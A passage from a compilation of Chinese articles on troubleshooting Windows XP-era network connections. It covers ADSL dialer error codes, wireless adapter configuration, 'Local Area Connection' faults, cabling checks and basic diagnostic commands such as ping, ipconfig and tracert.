    原因：ADSL Modem电源没有打开；网卡和ADSL Modem之间的连接线或网线出现问题；软件安装以后相应的协议没有正确绑定；在创建拨号连接时建立了错误的空连接。
    解决方法：检查电源、连接线；检查网络属性，与PPPoE相关的协议是否正确安装并正确绑定；检查拨号连接的属性，看看是否使用了一个“ISDN　channnel - Adapter Name?xx　”设备，该设备为一个空设备，应该选择正确的PPPoE设备代替它，或者重新创建拨号连接。


二、RasPPPoE拨号软件出错信息

《一键清理系统垃圾》

二、RasPPPoE拨号软件出错信息

    1.Error 645

    网卡没有正确响应。
    原因：网卡故障，或者网卡驱动程序故障。
    解决方法：检查网卡，重新安装网卡驱动程序。

    2.Error 678
    与ISP服务器不能连接。
    原因：ADSL网络服务提供商的服务器故障，或者ADSL电话线故障。
    解决方法：检查ADSL信号灯是否能正确同步。

    3.Error 691
    输入的用户名和密码不对，无法建立连接。
    原因：用户名和密码错误，网络服务提供商的服务器故障
    解决方法：使用正确的用户名和密码，并且使用正确的ISP账号格式。

    4.Error 791
    ADSL Modem连接设备没有找到。
    原因：ADSL Modem电源没有打开，网卡和ADSL Modem的连接线或LAN的网线出现问题，软件安装以后相应的协议没有正确绑定，在创建拨号连接时建立了错误的空连接。
    解决方法：检查电源、连接线；检查网络属性，与PPPoE相关的协议是否正确安装并正确绑定；检查拨号连接的属性，看看是否使用了一个“ISDN　channnel - Adapter Name?xx　”设备，该设备为一个空设备，应该选择正确的PPPoE设备代替它，或者重新创建拨号连接。

    5.Error 602、Error 633

    拨号网络由于设备安装错误或正在使用，不能进行连接。
    原因：RasPPPoE没有完全或正确安装。
    解决方法：卸载所有PPPoE软件、协议，重新安装。

    三、Enternet 500拨号软件出错信息

    1.E0040P
    原因：ADSL Modem电源没有打开；网卡和ADSL Modem之间的连接线或网线出现问题；软件安装以后相应的协议没有正确绑定；在创建拨号连接时建立了错误的空连接。
    解决方法：检查电源、连接线；检查网络属性，与PPPoE相关的协议是否正确安装并正确绑定；检查拨号连接的属性，看看是否使用了一个“ISDN　channnel - Adapter Name?xx　”设备，该设备为一个空设备，应该选择正确的PPPoE设备代替它，或者重新创建拨号连接。

2.E0037P
    输入的用户名和密码不对，无法建立连接。
    原因：用户名和密码错误；网络服务提供商的服务器故障。
    解决方法：使用正确的用户名和密码，并且使用网络服务商提供的账号格式。Enternet 300或Enternet 500

    一般情况下，主要有三类错误提示： E0037P：Login failed,make sure you have entered currect user name and password!
    问题：用户名和密码错误。
    解决方法：详见置顶的《关于FTTB用户的用户名和密码》。

    E0040P：Timeout to connect server
    问题：连接服务器超时。
    解决方法：遇到此情况，请检查一下室内的网络联线是否正常，网卡灯是否亮着？如果没有问题则请您打63192188报障。

    E0041：Failed on create adapter(device)
    问题：创建适配器（设备）失败。
    解决方法：这是您的拨号软件有问题，你必须卸载Enternet300或Enternet 500（卸载方法：打开“我的电脑”→“控制面版”→“添加删除程序”，找到Enternet300或Enternet 500，双击并开始卸载）。卸载完毕，重新启动后，再重新安装Enternet300。若仍然出现这种情况，那么建议您改换安装RasPPPoE等其他拨号软件。
    注意：XP操作系统不能安装Enternet300或Enternet 500，会出现E0041P的错误提示。

    WindowsXP自带拨号软件
    错误678：无法连接到远程计算机。
    问题：尝试连接到服务器失败
    解决方法：请您自检一下室内的网络联线是否正常，网卡灯是否亮着？若是都没有问题，那么实在抱歉，我们的网络存在问题，您只能报修了

    错误691：由于域上的用户名或密码无效而拒绝访问。
    问题：…………都写得这么明白了
    解决方法：还是详见置顶的《关于FTTB用户的用户名和密码》

    错误619：无法连接到指定的服务器，用于此连接的端口已关闭。
    问题：由于上次的连接出错，且重拨间隔时间过短，造成服务器对您的用户名和密码来不及响应。
    解决方法：建议您间隔一到二分钟后重试。

    错误769：无法连接到指定目标。
    问题：这是指你电脑的网络设备有问题
    解决方法：打开“我的电脑”→“控制面版”→“网络连接”，查看本地连接的是否处在“禁用”状态，是的话只需双击本地连接，看到状态变为“已启用”即可。若是连本地连接都没有的话，那你的网卡100%有问题了——不是没装好就是坏了。请您联系您的电脑供应商，或者自己解决。

    注意：成功连接上网以后你会看到屏幕右下角有两部电脑的图标。 若是要断开网络连接： Enternet 300或Enternet 500：右键这两部电脑的图标，并点击“Disconnect”，然后再点击“Exit”即可。 XP拨号连接：右键这两部电脑的图标，点击“断开”即可。 如果你拨号时显示的错误提示不在上述范围内，或者是你不太熟悉重装拨号软件的操作，请咨询63192188。

    补充： 打开enternet 300拨号软件后，只弹出最上面的一道蓝条，而无法显示输入帐号密码的界面。 对于该问题有如下两种解决方法：
    （如果对输入界面并不是特别要求的话。也可以这样操作（对着任务栏右下角的蓝色图标点右键） 左键点connect即可。）

    1、解决方法一
    进入enternet300的安装目录（一般在program filesEfficient NetworksEnterNet 300app或program filesntsEnterNet 300app），打开文件enternet.ini，找到[Window Size]下的一行命令：Rect=0304 0132 0609 0424（此行数字不确定）在这行命令前加*（星号）保存即可。

    2、解决方法二
    进入enternet300的安装目录(一般为c:program filesntsapp下)，将enternet.ini重命名如改为enternet1.ini）。然后双击桌面Enternet300快捷方式，系统就会由于找不到原来的ini文件，而自动清除原有的ADSL拨号连接，即是打开的窗口里只剩下"create new profile"一个图标。接下来需要做的就是重新建立一个拨号连接，然后双击它，之前的问题就迎刃而解了，而且安装目录里也会自动创建一个新的enternet.ini文件。


解决WindowsXP中无线网络连接故障

《一键清理系统垃圾》

解决WindowsXP中无线网络连接故障

如何排除 Windows XP 中的无线网络连接故障

    1. 查看 HCL，确定是否存在可用于您的无线适配器、与 Windows XP 兼容的驱动程序。
    ? 如果存在兼容的驱动程序，请在执行任何故障排除过程之前，安装更新的驱动程序。
    ? 如果不存在兼容的驱动程序，您也许能使用该网络适配器，但配置和功能可能非常有限。

    2. 要确定您使用的驱动程序是否识别 Windows XP 的“无线零配置”服务，请按照下列步骤操作：
    1. 依次单击开始、运行，然后在“打开”框中键入 control.exe。
    2. 单击“网络和 Internet 连接”。
    3. 单击“网络连接”，右键单击“无线连接”，然后单击“属性”。

    3. 查看可用选项。
    ? 如果在“网络连接”文件夹中看不到无线连接图标，或者如果无法查看属性，则无线网络适配器的驱动程序存在问题。要解决此问题，请参阅“驱动程序安装问题”一节。

    ? 如果可以查看无线连接图标的属性，但看不到无线网络选项卡，请参阅“不支持‘无线零配置’服务的驱动程序”一节。
    ? 如果可以查看属性，并且能够看到和访问无线网络选项卡，请参阅“支持‘无线零配置’服务的驱动程序”一节。
    ? 如果在“无线连接”属性中没有“身份验证”选项卡，请确保“无线零配置”服务正在运行。

驱动程序安装问题

    如果在“网络连接”文件夹中看不到无线连接图标，或者无法查看无线连接图标的属性，则驱动程序的安装可能存在问题。要解决此问题，请确保从设备制造商处获得最新的可用驱动程序，然后按照以下步骤开始确定问题的来源：
    1. 依次单击开始、运行，然后在“打开”框中键入 devmgmt.msc。
    2. 在“计算机管理”中，单击设备管理器。
    3. 在细节窗格中，双击其他设备，然后查找无线网络适配器。如果可以在“其他设备”文件夹中找到该适配器，则表明尚未安装驱动程序。要解决此问题，请从设备制造商处获取驱动程序，然后安装此驱动程序。
    4. 如果在“其他设备”文件夹中找不到该适配器，请在“网络适配器”文件夹中查找。
    5. 找到无线网络适配器时，记下适配器的品牌和型号。
    6. 在无线网络适配器的属性中，在“设备状态”下，验证是否出现此消息：“该设备工作正常”。
    7. 如果无线网络适配器不在“网络连接”文件夹中，则要么是设备有问题，要么可能是未安装驱动程序。在这种情况下，您将在“设备状态”下看到一条错误信息。您可以搜索 Microsoft 知识库，查找有关错误代码的信息以解决此问题。若要搜索知识库，请访问下面的 Microsoft 网站： http://support.microsoft.com/ ．

不支持“无线零配置”服务的驱动程序

    如果可以查看无线连接图标的属性，但看不到无线网络选项卡，这表明网络适配器驱动程序并不完全支持“无线零配置”服务。

    在这种情况下，您也许能配置 Windows XP 以使用连接，但配置选项可能因所使用的网络适配器和驱动程序而异。要解决此问题，请尝试创建一个有效的连接。

    注意：如果无法创建有效的连接，请与设备制造商联系，以便获取有关如何配置用于 Windows XP 的适配器的建议。

    要创建有效的连接，请执行下列步骤：

    1. 在“网络连接”文件夹中，右键单击无线连接，然后单击属性。
    2. 单击配置，然后在高级选项卡上，使用可用的配置选项来配置您的无线网络。可用选项和选项名可能因驱动程序制造商而异。
    下面的列表介绍了基本的配置选项：
    ? 服务设置标识符 (SSID)：此设置应该与您的无线访问点或路由器的配置相匹配。如果您没有访问点，则该值将在无线网络中的所有计算机上都相同。
    ? 无线对等协议 (WEP) 或加密：为进行测试，请在访问点上和这些属性中都禁用 WEP。
    ? 模式或网络类型：如果您有访问点，请将此选项设置为基础结构。如果您没有访问点，并且您要连接各计算机，请将此选项设置为特殊。
    ? 数据速率：将此选项设置为自动或 11 Mbps。
    ? 节电：为了解决问题，请将节电设置为关闭或禁用。连接正常工作后，可以更改此设置。
    3. 配置这些选项后，请单击确定以保存所做的更改。
    4. 测试连接。如果“网络连接”文件夹中的连接图标上显示一个红色的“X”，或者您无法连接，请继续进行故障排除。
    5. 依次单击开始、运行，然后在“打开”框中键入 devmgmt.msc。
    6. 在“计算机管理”中，双击服务和应用程序，然后单击服务。
    7. 在细节窗格中，右键单击无线零配置，然后单击属性。
    8. 在“启动类型”框中，单击禁用，然后单击确定。
    9. 退出“计算机管理”，然后重新启动计算机。

    使用此配置时，如果其他网络配置正确，则您可以连接到无线网络。如果无线连接图标在通知区域中显示为有效连接，则无线连接将可以工作。 要解决任何其余的问题，请使用标准的 TCP/IP 网络故障排除方法。

    支持“无线零配置”服务的驱动程序

    如果无线连接属性中的无线网络选项卡可用，则驱动程序能识别无线网络的“Windows XP 零配置”支持。

    要为您的无线网络配置 Windows XP，请执行以下步骤：
    1. 在“网络连接”文件夹中，右键单击无线连接，然后单击属性。
    2. 在无线网络选项卡的可用网络框中，单击您的网络，然后单击配置。
    3. 在“配置”窗口中，提供您的网络使用的服务设置标识符 (SSID)、WEP 设置（加密）以及对您的网络所必需的身份验证设置。如果您没有使用无线访问点或路由器，则将网络模式设置为特殊。
    4. 如果您的网络没有作为可用网络列出，请单击添加以手动配置网络设置。保存这些设置后，如果网络可用，您就可以自动使用它们了。
    5. 保存此配置后，请在网络上的其他计算机上重复此过程。
    6. 配置其他计算机上的设置后，您将在首选网络列表中看到网络 SSID 名称。如果您看到一个蓝色圆圈，表示已经找到网络；如果看到一个红色的“X”，表示网络上的工作站之间的无线电信号可能有问题或配置可能不正确。确认网络上的设置是正确的，然后将计算机移动到距离访问点或路由器更近的位置，或者移动到距离无线网络上的其他计算机更近的位置。

    完成这些配置步骤后，无线连接将会正确配置。

    如果您在尝试连接到网络时遇到问题，请双击“网络连接”文件夹中的无线连接图标，以查看连接状态。在“连接状态”中，有一个信号强度表，用它可以检查计算机之间的信号强度。

    强信号　　如果您在连接时仍然有问题，但信号强度正常，则可能是其他网络配置问题妨碍了通信。要解决此问题，请使用标准的 TCP/IP 故障排除方法。

    弱信号　 如果您在连接时仍然有问题，并且信号强度不好或者收不到信号，请尝试“不支持‘无线零配置’服务的驱动程序”一节中的步骤。如果该节中说明的方法仍不能解决问题，请与制造商联系，以确定无线网络适配器和访问点是否工作正常。


本地连接故障及解决

《一键清理系统垃圾》

本地连接故障及解决

无论是上Internet还是联局域网，我们都需要从“本地连接”下手，对网络参数进行合适的配置。不过在实际上网过程中，我们有时会发现“本地连接”可能发生各种莫名其妙的故障，这些故障往往导致我们无法对网络参数进行有针对性地设置，从而影响我们的上网效率。为了有效提高上网效率，我们必须掌握一些与“本地连接”相关故障的排除方法;这不，本文下面就列出了“本地连接”比较容易发生的几则故障现象，并对每一故障现象提出了不同的应对办法，相信能给大家带来收获!

    IP地址设置错误导致的"本地连接"受限故障

    部分ADSL用户在Windows XP SP2操作系统下，进行宽带拨号上网时往往会使用Windows系统内置的PPPoE拨号方式;不过在用该方式进行上网时，这些用户可能会在网络连接列表窗口中发现“本地连接”图标的显示状态，常常会莫名其妙地被调整为“受限制或无连接”，不过在这种状态下上网操作倒是能正常进行。那这种奇怪的状态显示故障是怎么出现的呢，我们又该如何消除这样的故障现象呢?

    如果“本地连接”的显示状态无缘无故地变成“受限制或无连接”，这通常是没有给网卡指定固定的IP地址造成的。正常情况下，当我们发现“本地连接”的显示状态不正常时，往往可以先尝试为网络连接设置一个静态的IP地址，这种方法常常能为我们解决不少莫名其妙的网络故障。一旦我们发现本地的网络连接没有使用固定的IP地址时，可以依次单击“开始”/“设置”/“网络连接”命令，在其后出现的网络连接列表界面中，用鼠标右键单击“本地连接”图标，从右键菜单中执行“属性”命令，打开本地连接的属性设置窗口;在该窗口的“常规”标签页面中，选中“Internet协议”项目，并单击一下“属性”按钮
之后，选中“使用下面的IP地址”选项，并将本地计算机的IP地址尝试设置为“192.168.0.2”，然后再将本地网关的IP地址设置为“192.168.0.1”(默认状态下，多数ADSL设备的出厂IP地址都为192.168.0.1)，最后单击“确定”按钮，并重新启动一下计算机系统，相信“本地连接”的状态受限故障多半能够解决了。

    伪设备导致的“本地连接”故障

    一般来说，计算机中每安装配置一块网卡，那么在网络连接列表窗口中就应该有一个对应的“本地连接”图标出现，如果计算机中同时安装了多块网卡的话，那么我们就应该能看到有多个“本地连接”图标出现，并且每个“本地连接”的名称后面都应该有类似“2”、“3”这样的数字，来与网卡的数目相对应。事实上，我们有时明明在计算机中只安装了一块网卡，但网络连接列表窗口中仍有可能出现两个“本地连接”图标，那为什么会出现这种故障现象，我们该怎样解决该故障呢?

    如果计算机中只有一块网卡，但网络连接列表窗口中出现了两个“本地连接”图标的话，那就表明当前网卡驱动至少在本地计算机中被重复安装了两次，这种现象往往出现在我们将网卡插槽位置更改之后。一般来说，当网络反应不象正常那样灵敏时，我们往往总喜欢打开计算机机箱，来尝试将网卡的安装位置从原来的插槽调整到其他的插槽中，以便改善网卡与插槽的接触可靠程度;在调整网卡安装位置时，我们即使在改变网卡位置之前没有将原先的网卡驱动程序卸载掉，但是在网卡位置变动后Windows系统仍提示我们必须对新位置处的网卡驱动程序进行重新安装，特别是对于那些启用了即插即用功能的网卡来说，Windows往往不提示我们就自动重新安装了网卡的驱动程序，如此一来，相同网卡设备的驱动程序就可能被系统重复进行了两次安装。而网卡原先的驱动程序由于没有被及时卸载掉，因此更换位置后网卡的驱动程序依然还在Windows系统中，并且更换位置后网卡的驱动程序又被安装了一次，考虑到本地计算机中已经出现了一个“本地连接”，因此后出现的“本地连接”图标为避免重名往往会自动在名称后面加上“2”、“3”之类的数字。
很显然，这种网卡被重复安装的现象往往会给我们带来麻烦，比方说，要是之前我们已经为网卡设备设置好了IP地址，当网卡安装位置变化之后再次尝试为该网卡设置相同的IP地址时，Windows系统将会自动弹出提示，告诉我们当前IP地址与其他网卡地址发生了冲突，并要求我们必须重新为该网卡设置其他的IP地址，这么一来，我们就没有办法继续使用以前的IP地址了。但是，当我们手头只有原先个一个IP地址可用时，我们该如何才能消除IP地址冲突提示呢?其实很简单，我们可以按如下操作步骤来将先前安装的虚拟网卡设备删除掉:

    依次单击“开始”/“运行”命令，打开系统运行对话框，并在其中输入字符串命令“cmd”，单击“确定”按钮后，将系统运行状态切换到MS-DOS命令行模式;

    在DOS命令行中，输入字符串命令“set devmgr_show_nonpresent_devices=1”(如图2所示)，单击回车键后，Windows系统就能自动把隐藏在计算机中的所有虚拟设备都显示出来了;

接着在DOS提示符下，继续输入字符串命令“start devmgmt.msc”，单击回车键后，直接进入系统的设备列表界面，然后依次单击该界面菜单栏中的“查看”/“显示隐藏的设备”菜单项，我们就能在该列表界面中找到虚拟网卡设备的“身影”了;

    此时用鼠标双击该虚拟设备图标，进入该设备的属性设置界面，单击该界面中的“驱动程序”标签，然后单击对应标签页面中的“卸载”按钮，就能将先前安装的虚拟网卡设备从计算机系统中删除掉了。

    当然要是我们对系统注册表比较熟悉的话，也可以打开系统的注册表编辑窗口，然后依次单击该窗口菜单栏中的“编辑”/“查找”命令，并在其后出现的查找对话框中输入“本地连接”关键字，来将所有的“本地连接”项值搜索出来;之后，将需要的“本地连接”项值保存下来，其他的项值全部删除掉，最后关闭注册表编辑窗口，并重新启动一下计算机系统，这样也能顺利将原来的网卡设备彻底卸载掉。

    当将虚拟的网卡设备卸载掉之后，我们再次打开网络连接列表窗口时，就会发现本地系统中现在只剩下唯一一个“本地连接”图标了，此时我们就能将原先的IP地址重新分配给更换位置之后的网卡设备了。

    “本地连接”丢失故障

    有时我们想对网络参数进行重新配置，可是进入网络连接列表窗口后，竟然发现“本地连接”图标不翼而飞了!找不到“本地连接”图标，我们怎么设置网络参数呀?!那“本地连接”是怎么丢失的呢，我们又该如何才能让它“失而复得”呢?

    事实上，造成“本地连接”丢失故障的因素有多种，例如网卡没有安装成功，与“本地连接”相关的系统服务被不小心停止了，网络参数没有设置正确，或者对系统进行了不恰当的设置等。不同的因素引发的“本地连接”丢失故障，需要使用不同的方法来应对:

    首先打开系统的设备管理器界面，检查一下是否存在网卡设备，如果找不到的话，那就证明网卡还没有安装好，那必须重新正确安装好网卡设备;如果网卡能够显示在设备管理器中的话，那可以用鼠标右键单击网卡设备，并从其后出现的右键菜单中执行“属性”命令，在随后出现的窗口中，我们就能查看到网卡设备的当前工作状态了(如图3所示)，如果发现该设备处于不可用状态，不妨更换一下网卡的安装位置，然后再重新安装一次网卡的驱动程序，看看能不能将故障现象消除掉;要是重装网卡还无法让网卡工作状态恢复正常的话，那十有八九是网卡自身已经损坏，此时必须重新更换新的网卡设备。

其次进入到系统的服务列表界面，检查一下与“本地连接”有关的系统服务启动状态，例如看看“Network Connections”服务是否已经处于启用状态，如果发现该服务被停用的话，再检查一下与“Network Connections”服务有关的远程过程调用服务“Remote Procedure Call”是否工作正常，因为一旦将该服务不小心禁用的话，“Network Connections”服务也有可能会随之停用。当然，要是“Plug and Play”服务工作不正常的话，也能影响到“本地连接”图标的正常显示，因此我们也必须保证该服务能运行正常。

    接着我们可以打开系统的运行对话框，在其中执行“Dcomcnfg.exe”字符串命令，进入系统的分布式COM配置界面，单击其中的“默认属性”标签，查看对应标签页面中的“在这台计算机上启用分布式COM”是否处于选中状态，如果该项目此时并没有处于选中状态的话，那“本地连接”丢失故障多半是由该因素引起的，此时我们只有重新将“在这台计算机上启用分布式COM”选中，同时将模拟级别权限调整为“标识”，最后单击一下“确定”，这样的话“本地连接”图标在系统重新启动之后说不定就可以出现了。

    如果上面的几个步骤还不能让“本地连接”图标重见天日的话，那我们有必要检查一下是否人为将“网上邻居”功能隐藏起来了，如果是这样的话我们必须打开系统运行框，在其中执行“poledit”字符串命令，打开系统策略编辑器界面;依次单击该界面菜单栏中的“文件”/“打开注册表”项目，然后双击其后界面中的“本地用户”图标，再逐一单击“外壳界面”/“限制”项目，并将“限制”项目下的“隐藏网上邻居”取消选中，最后保存好上面的设置操作，并重新启动一下计算机系统，就能恢复网上邻居的显示功能，这样多半也能解决“本地连接”丢失故障。


典型网络故障解决方法

《一键清理系统垃圾》

典型网络故障解决方法

搭建家庭局域网不难，想要一次调通可不是那么容易。不过，难者不会，会者不难，掌握了下面这些小技巧，你就可以轻松解决网络软硬故障了。

    一．硬件故障

    硬件故障主要有网卡自身故障、网卡未正确安装、网卡故障、集线器故障等。

    首先检查插上计算机I/O插槽上的网卡侧面的指示灯是否正常，网卡一般有两个指示灯“连接指示灯”和“信号传输指示灯”，正常情况下“连接指示灯”应一直亮着，而“信号传输指示灯”在信号传输时应不停闪烁。如“连接指示灯”不亮，应考虑连接故障，即网卡自身是否正常，安装是否正确，网线、集线器是否有故障。

    我们先大致从网卡外表观察一下：

    1．RJ45接头的问题

    RJ45接头容易出故障，例如，双绞线的头没顶到RJ45接头顶端，绞线未按照标准脚位压入接头，甚至接头规格不符或者是内部的绞线断了。

    镀金层厚度对接头品质的影响也是相当可观的，例如镀得太薄，那么网线经过三五次插拔之后，也许就把它磨掉了，接着被氧化，当然也容易发生断线。

    2．接线故障或接触不良

    一般可观察下列几个地方：双绞线颜色和RJ-45接头的脚位是否相符；线头是否顶到RJ-45接头顶端，若没有，该线的接触会较差.需再重新压按一次；观察RJ-45侧面。金属片是否已刺入绞线之中？若没有，极可能造成线路不通；观察双绞线外皮去掉的地方，是否使用剥线工具时切断了绞线（绞线内铜导线已断，但皮未断）。

    如果还不能发现问题，那么我们可用替换法排除网线和集线器故障，即用通信正常的电脑的网线来连接故障机，如能正常通信，显然是网线或集线器的故障，再转换集线器端口来区分到底是网线还是集线器的故障，许多时候集线器的指示灯也能提示是否是集线器故障，正常对应端口的灯应亮着。

    二．软件故障

    如果网卡的信号传输指示灯不亮，这一般是由网络的软件故障引起的。

    1．检查网卡设置

    普通网卡的驱动程序磁盘大多附有测试和设置网卡参数的程序。分别查验网卡设置的接头类型、IRQ、I/O端口地址等参数，若有冲突.只要重新设置（有些必须调整跳线），一般都能使网络恢复正常。

    另外检查一下网卡驱动程序是否正常安装。不同网卡使用的驱动程序亦不尽相同，假如你选错了，就有可能发生不兼容的现象。修复的方法亦不难，只要找到正确的驱动程序.重新安装即可。

    最后我们简单检验一下网卡设置故障是否排除。打开“控制面板-系统-设备管理器”，选中我们安装的网络适配器，点击“属性”按钮，在“常规”文件夹中，可以查看网卡是否在正常工作。

    2．检查网络协议

    打开”控制面板-网络-配置”选项，查看已安装的网络协议，必须配置以下各项：NetBEUI协议和TCP/IP协议，Microsoft友好登录，拨号网络适配器。如果以上各项都存在，重点检查TCP/IP是否设置正确。在TCP/IP属性中要确保每一台电脑都有唯一的IP地址，将子网掩码统一设置为255.255.255.0，网关要设为代理服务器的IP地址（如192.168.0.1）。另外必须注意主机名在局域网内也应该是唯一的。最后，我们用ping命令来检验一下网卡能否正常工作。

    (1)．ping 127．0．0．1

    127.0.0.1是本地循环地址.如果该地址无法ping通，则表明本机TCP/IP协议不能正常工作；如果ping通了该地址，证明TCP/IP协议正常，则进入下一个步骤继续诊断。
    (2)．ping本机的IP地址

    使用ipconfig命令可以查看本机的IP地址，ping该IP地址，如果ping通，表明网络适配器（网卡或者Modem）工作正常，则需要进入下一个步骤继续检查；反之则是网络适配器出现故障。
(3)．ping本地网关

    本地网关的IP地址是已知的IP地址。ping本地网关的IP地址，ping不通则表明网络线路出现故障。如果网络中还包含有路由器，还可以ping路由器在本网段端口的IP地址，不通则此段线路有问题，通则再ping路由器在目标计算机所在同段的端口IP地址.不通则是路由出现故障。如果通，最后再ping目的机的IP地址。

    (4)．ping网址

    如果要检测的是一个带DNS服务的网络（比如Internet），上一步ping通了目标计算机的IP地址后。仍然无法连接到该机，则可以ping该机的网络名，比如：ping www.sohu.com.cn，正常情况下会出现该网址所指向的IP地址，这表明本机的DNS设置正确而且DNS服务器工作正常，反之就可能是其中之一出现了故障。

    常用DOS命令

    1．ping命令

    ping命令是用于确定本地主机是否能与另一台主机成功交换数据包。根据返回的信息，可以推断TCP/IP参数（因为现在网络一般都是通过TCP/IP协议来传送数据的）是否设置正确，以及运行是否正常、网络是否通畅等。但ping成功并不代表TCP/IP配置一定正确，你有可能要执行大量的本地主机与远程主机的数据包交换，才能确信TCP/IP配置无误。

    ping命令可以在MS-DOS窗口下运行，执行格式如下：

    ping 网址

    例如：ping 127.0.0.1

    2．ipconfig命令

    ipconfig这个命令，通常只被用户用来查询本地的IP地址、子网掩码、默认网关等信息。ipconfig、ping是我们在诊断网络故障或查询网络数据时常用的命令，它们的使用也很简单，即使你不知道它们的应用格式，也可以通过“ipconfig/?”或“ping/?”这种标准的DOS命令帮助方式来获取相关信息。

    3．tracert命令

    tracert命令能够追踪你访问网络中某个节点时所走的路径.也可以用来分析网络和排查网络故障。举个例，我想知道自己访问sohu.com.cn时走的是怎样一条路线，就可以在DOS状态下输入tracert sohu.com.cn，执行后经过一段时间等待，系统会反馈出很多IP地址。最上方的IP地址是本地的网关，而最后面一个地址就是sohu.com.cn网站的IP地址了。换句话说，从上至下，便是我们访问sohu.com.cn所走过的“足迹”。

    4．netstat命令

    netstat命令是一个监控TCP/IP网络的实用的工具，它可以显示实际的网络连接以及每一个网络接口设备的状态信息。Netstat命令的参数不是很多，我们常用Netstat -r来监视网络的连接状态，非常管用。

    在网络出现故障时，我们经常交替使用上面这四个命令，以方便查找故障


解决无线网络连接故障

《一键清理系统垃圾》

解决无线网络连接故障

  无线网络设备的价格日趋平易近人，众多网虫纷纷告别网线的束缚，开始享受无线带来的无拘无束的快乐。但是，有些读者还是反映网络时常出现连接失败的情况。今天，我们就把一些无线连接故障的实例集中起来作个详细的分析并提供解决的方案。

    无线技术常识

    无线局域网(WLAN)的工作频段一般在2.4GHz，属微波通讯的范畴。传输特点是直线型、可见型，即目视范围的通信联系方式。这就说明雨、雾、墙等障碍均能影响到微波的传输质量。所以，我们在使用无线技术时也应该考虑到这些特点，在适当的环境下搭建网络。

    无线通讯的距离与辐射功率、天线的方向性以及天线增益有关。常见的无线设备辐射输出功率在200mW以下，无线网卡的功率一般仅几十mW。目前的无线设备一般自带全向天线，全向天线电波以天线为轴，呈“面包圈”状向外辐射；定向天线具有极强的方向性，在小角度的辐射范围外是完全没有信号的；使用可拆卸天线的设备可以外接增益天线，可以在不增加天线辐射功率的情况下增加通讯距离。

    微波在线缆中传输的要求很高，信号在线缆、接口上的损耗超出人们的想象，普通线材不适合做天线信号的传输介质。

    无线网络常见通讯故障

    在多数情况下，无线设备连接故障是由于使用不当引起的。通常表现有连接困难、通讯速度慢、掉线等故障。其故障原因一般分为三个：

    环境因素：AP与网卡间的距离过长；AP与网卡间有障碍物影响，比如室内复杂环境，墙壁、家具影响。

    人为因素：工作在2.4GHz频段的微波设备，如微波炉；网络线缆、天线线缆接触故障；定向天线特性等影响。

    设备因素：如设备过热；缓存过小等。

    故障实例及分析解决

    例一 AP+PCI台式机无线网卡组合，300平方米办公室环境，AP位于独立单间机房内部，最远网卡通讯距离约30米，在AP的覆盖范围内。最远距离时网卡连接正常后（连接速率稳定在5.5Mbps~11Mbps间）固定AP位置。施工结束后发现有多个连接盲点。

    分析解决：盲点设备区域网卡安置在落地的台式机上，网卡与AP间有操作员、PC设备、办公桌柜用具以及机房墙壁阻隔导致通讯连接故障。考虑到室内无吊顶，AP无外接天线接口，所以不适合使用外接天线。在不增加成本，不破坏室内美观的条件下，可以把AP挂在机房墙壁外，并最大限度提高安装高度，调整好终端位置后就可解决有盲点的问题。

    例二 AP+AP桥接通讯组合，通讯距离约150米，两AP都在室内，无建筑阻隔，通讯速率最高2Mbps，经常发生连接失败的故障。

    分析解决：这样的距离基本接近AP桥接的最远距离，架设外接增益天线是最好的解决方案。考虑到成本因素，可以使用另一种方案：两AP安装至室外墙壁，利用两墙壁作为反射物增强前方辐射波。在AP与墙面间以铝塑板做盆状容器保护，既美观又解决了防水、防晒难题，还起到了很好的反射作用。处理后的连接速率最高达到11Mbps，掉线现象不会再出现。

    例三 AP+笔记本电脑无线网卡组合，直线通讯距离20米，终端处在地下室位置，AP位于与地下室建筑物呈直角的三楼，故障现象是连接时好时坏，连接速率在最高11Mbps至无信号之间波动。

    分析解决：通讯距离不长，但墙与地的隔离作用影响了通讯质量，环境移动物体（车辆）因素变化导致复杂折射/反射，信号强度变化巨大。我们可以采取以下方案稳定信号：增加网卡外置天线；调整AP天线角度使天线辐射角度垂直于地下室笔记本电脑网卡；在AP天线的后端增加反射铝塑板。这样处理后连接速率应该就能稳定起来。

    例四 AP+笔记本电脑无线网卡+PCI台式机无线网卡家用组合，这是一个典型的家用无线局域网应用。用户反映，即使网卡与AP同在一个房间之内，两机ADSL拨号（带路由功能）掉线现象也十分频繁。

    分析解决：试着使用USB或LAN连接路由器和PC机，如果发现拨号连接稳定，长时间工作不掉线，由此就可判断故障可能来自于无线设备。进行了改善AP电源质量、散热等多种尝试均未见明显效果，则判断掉线现象为AP缓存过小引起的。处理办法是更换AP或限制传输速率。考虑成本，使用限速方案。设置AP最高连接速率2Mbps后，故障明显减少，也基本满足两机同时上网需要。

    例五 某无线网络更换使用室外平板增益天线后，网络终端无信号。

    分析解决：正常情况下，使用外接增益天线后网络会增加连接距离，网络终端无信号，有可能是定向天线的方向性故障。调整方向、垂直角度后故障便会消失。
小知识：通常远距离连接的无线网络一般会选用增益很高、方向性很强的八木天线、栅格天线、抛面天线、背射天线。而某些平板天线经特殊设计后也具有很强方向性以及定向增益，这类天线的方向性在使用中容易被忽视。

    例六 外接天线使用一段时间后连接无信号。

    分析解决：天线使用一段时间后出现连接故障，常见原因是接口接触不良。检查接口是否做好防水处理，如果发生锈蚀的情况，可用玻璃胶做外部防水涂覆处理。另外，也有可能是被雷击的特殊情况，对于这种情况一般很难维修，应该即时更换设备。


六步顺利排除计算机网络连接故障

《一键清理系统垃圾》

六步顺利排除计算机网络连接故障

第 1 步：检验电缆

    首先，检查计算机与网络插口之间的电缆。对于 10/100 网络环境，只需一种能检查开路、短路和布线的工具即可工作。而对于千兆以太网，则还需检查电缆中是否存在串扰和阻抗故障。我们推荐使用电缆鉴定测试器，它可在实时网络中测试串路和阻抗故障。

    第 2 步：确认连接到交换机

    将便携式网络工具（而不是问题计算机）连接到办公室线路，检查是否可以建立链路。如果端口被管理员关闭，则工具将无法连接。接着，检查端口配置以确保端口可用且已按正确的 VLAN 进行配置。为获得最佳结果，应使用可支持 10/100/Gig 连接的工具。不过，通常 10/100 连接的工具即可工作。

    第 3 步：申请 DHCP 地址

    一旦建立链路之后，即可使用工具从服务器申请 DHCP 地址。应确保分配的地址与相应的子网相符；检验子网掩码；确认默认网关和 DNS 服务器地址。如果工具未能从服务器获得响应，它应该可以通过分析广播流量检测出相应的子网。通过从交换机获得的 Cisco 发现协议 (CDP) 报告，检查工具所连接的交换机端口，并确认子网配置。

    第 4 步：Ping 网络上的设备

